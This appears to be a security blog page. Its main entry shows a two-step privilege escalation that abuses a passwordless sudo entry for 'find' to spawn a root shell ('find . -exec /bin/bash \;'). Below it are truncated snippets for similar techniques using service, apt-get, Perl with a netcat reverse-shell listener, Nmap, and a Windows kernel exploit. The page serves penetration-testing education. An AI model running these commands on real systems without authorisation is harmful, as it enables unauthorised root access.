find Linux command can help us escape from a restricted shell, if you get to run the program with higher privileges, like NOPASWD entry in /etc/sudoers. How to 1. sudo -l 2. find . -exec /bin/bash \;
Search Results


service – Privilege Escalation
Sudo (NOPASSWD) service - Privilege Escalation If you ever get to run “service” command with root privileges, you can escape from restricted shell to root. In this example /etc/sudoers has allowed an user to run this program as root without password need. How to 1....
apt-get – Privilege escalation
apt-get - Privilege escalation apt-get can be used to escalate privileges when sudo is allowed without password. How to 1. check the permissions this user has sudo -l We can see that /usr/bin/apt-get is allowed (NOPASSWD) 2. get into changelog documentation sudo...
Windows Exploit MS15-051 – CVE-2015-1701 – Privilege Escalation
This vulnerability exploit windows kernel vulnerability that leads to privilege escalation. Vulnerable: Microsoft Windows Vista Service Pack 2 0 Microsoft Windows Server 2008 for x64-based Systems SP2 Microsoft Windows Server 2008 for Itanium-based Systems SP2...
Linux config enumeration – linuxprivchecker
This script is intended to be executed locally on a Linux box to enumerate basic system info and search for common privilege escalation vectors such as world writable files, misconfigurations, clear-text passwords and applicable exploits....
Perl – privilege escalation
Using Pearl to elevate privileges using a reverse shell. Exploit 1. Check sudo permissions sudo -l 2. Start a listener on Kali/Parrot nc -lvnp 4445 3. run perl using sudo as no password is required. sudo /usr/bin/perl -e 'use...
Nmap – privilege escalation
Nmap is a scanner for network and OS services detection. However, if misconfigured to be used with “sudo” or “administrator” privileges can lead to a privilege escalation. Exploit 1 1. Check what sudo permission the current user has, desired “NOPASSWD” sudo -l 2....